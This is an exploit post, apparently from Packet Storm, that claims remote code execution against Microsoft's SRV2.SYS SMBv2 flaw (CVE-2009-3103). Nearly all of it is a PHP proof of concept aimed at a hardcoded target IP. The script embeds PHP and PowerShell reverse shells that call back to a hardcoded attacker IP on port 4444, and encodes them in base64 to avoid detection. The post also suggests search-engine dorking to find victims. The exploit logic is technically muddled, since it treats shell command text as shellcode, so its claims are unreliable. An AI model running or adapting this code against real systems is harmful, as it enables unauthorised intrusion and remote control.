Microsoft SRV2.SYS SMB 2 Remote Code Execution

=============================================================================================================================================
    | # Title     : Microsoft SRV2.SYS SMB v2 RCE Vulnerability                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://Microsoft.com                                                                                                       |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+]Code Description: In the previous code (linked: https://packetstorm.news/files/id/180562/ Linked CVE numbers: CVE-2009-3103),
    
       The exploit was only causing DoS (denial of service), but we can develop it to attempt to execute commands on the target system instead.
    
       The exploit targets SMBs, and sends a Reverse Shell payload, allowing the attacker to take remote control of the target if the exploit is successful.
    	
    [+] save code as poc.php.
    
    [+] Set Target : line  58 
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    class SMBExploit {
        private $host;
        private $port;
        private $offset;
        private $socket;
    
        public function __construct($host, $port = 445, $offset = 0xffff) {
            $this->host = $host;
            $this->port = $port;
            $this->offset = $offset;
        }
    
        public function connect() {
            $this->socket = fsockopen($this->host, $this->port, $errno, $errstr, 5);
            if (!$this->socket) {
                die("Connection failed: $errstr ($errno)\n");
            }
            echo "Connected to {$this->host}:{$this->port}\n";
        }
    
        public function checkSMB() {
            $pkt = "\x00\x00\x00\x00\xFFSMB\x72\x00\x00\x00\x18\x53\xC8";
            fwrite($this->socket, $pkt);
            $response = fread($this->socket, 1024);
            
            if ($response) {
                echo "SMB Response: " . bin2hex($response) . "\n";
                return true;
            } else {
                echo "No SMB response. crashed...\n";
                return false;
            }
        }
    
        public function sendPayload() {
            if (!$this->checkSMB()) {
                return;
            }
            
            $shellcode = "\x90" . str_repeat("\x90", 100); // NOP Sled
            $shellcode .= "\xfc\xe8\x82\x00\x00\x00\x60\x31\xd2"; // Shellcode يبدأ بـ NOP ثم كود تنفيذ أوامر
            
            // كود Reverse Shell لفتح اتصال مع المهاجم
            $attacker_ip = "41.200.74.32";
            $attacker_port = 4444;
            
            // تحويل أوامر الـ Reverse Shell إلى Base64 لتجنب الكشف عنها
            $reverse_shell_linux = base64_encode("php -r '\$sock=fsockopen(\"$attacker_ip\",$attacker_port);exec(\"/bin/sh -i <&3 >&3 2>&3\"); fclose(\$sock);'");
            
            $reverse_shell_windows = base64_encode("powershell -NoP -NonI -Exec Bypass -W Hidden -EncodedCommand " . base64_encode(
                "\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port);"
                . "\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};"
                . "while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){"
                . "\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);"
                . "\$sendback = (iex \$data 2>&1 | Out-String );"
                . "\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';"
                . "\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);"
                . "\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}"
                . "\$client.Close()"
            ));
            
            // اختيار الـ Shellcode المناسب
            $reverse_shell = (stristr(PHP_OS, 'WIN')) ? $reverse_shell_windows : $reverse_shell_linux;
    
            // تحويل الأمر إلى Shellcode بطريقة Hex
            $hex_command = bin2hex(base64_decode($reverse_shell));
            $shellcode .= hex2bin($hex_command);
    
            $pkt = "\x00\x00\x00\x00"; // SMB header
            $pkt .= "\xFFSMB"; // SMB Signature
            $pkt .= "\x72\x00\x00\x00\x18\x53\xC8"; // Negotiate Request
            $pkt .= pack("v", $this->offset); // ProcessIDHigh
            $pkt .= "\x00\x00\x00\x00"; // Extra fields
            $pkt .= $shellcode; // إدراج الـ Shellcode داخل الحزمة
    
            fwrite($this->socket, $pkt);
            echo "Payload sent, waiting for response...\n";
    
            sleep(2); // تأخير لمنح وقت لتنفيذ الكود
            $response = fread($this->socket, 1024);
            if (!$response) {
                echo "Exploit executed successfully! Check your listener.\n";
            } else {
                echo "Response received: " . bin2hex($response) . "\n";
            }
        }
    
        public function disconnect() {
            fclose($this->socket);
            echo "Disconnected.\n";
        }
    }
    
    $exploit = new SMBExploit("5.2.91.205");
    $exploit->connect();
    $exploit->sendPayload();
    $exploit->disconnect();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================